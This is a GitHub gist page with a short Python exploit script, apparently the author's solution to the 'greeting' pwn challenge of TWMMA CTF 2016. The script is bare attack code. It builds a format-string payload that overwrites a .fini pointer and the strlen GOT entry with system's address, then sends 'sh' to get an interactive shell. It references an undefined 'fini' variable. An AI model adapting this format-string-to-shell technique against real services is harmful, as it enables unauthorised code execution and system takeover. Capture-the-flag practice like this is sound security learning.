Skip to content

Instantly share code, notes, and snippets.

@tsunpoko

tsunpoko/exploit.py

Last active September 20, 2016 11:25
Show Gist options
  • Save tsunpoko/8acd0b4ac23e62bf2c618bb22a4b9523 to your computer and use it in GitHub Desktop.
Save tsunpoko/8acd0b4ac23e62bf2c618bb22a4b9523 to your computer and use it in GitHub Desktop.
Download ZIP
[TWMMA CTF 2016] Pwn greeting
Raw
exploit.py
from No___Op import *
if len(sys.argv) < 2:
target = "localhost:4444"
else:
target = "pwn2.chal.ctf.westerns.tokyo:16317"
plt = {
'system': 0x08048490
}
got = {
'strlen': 0x8049a54,
'puts' : 0x8049a44,
'printf': 0x8049a38
}
c = Pwning( target )
payload = 'aa'
payload += p32(fini)
payload += p32(got['strlen'])
payload += p32(got['strlen'] + 2)
payload += '%223x'
payload += '%12$hhn'
payload += '%' + str(33713 - 0x20) + 'x'
payload += '%13$hn'
payload += '%' + str(33907 - 255) + 'x'
payload += '%14$hn'
payload += '\n'
c.write(payload)
info_pay(payload)
c.write('sh\n')
c.shell()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment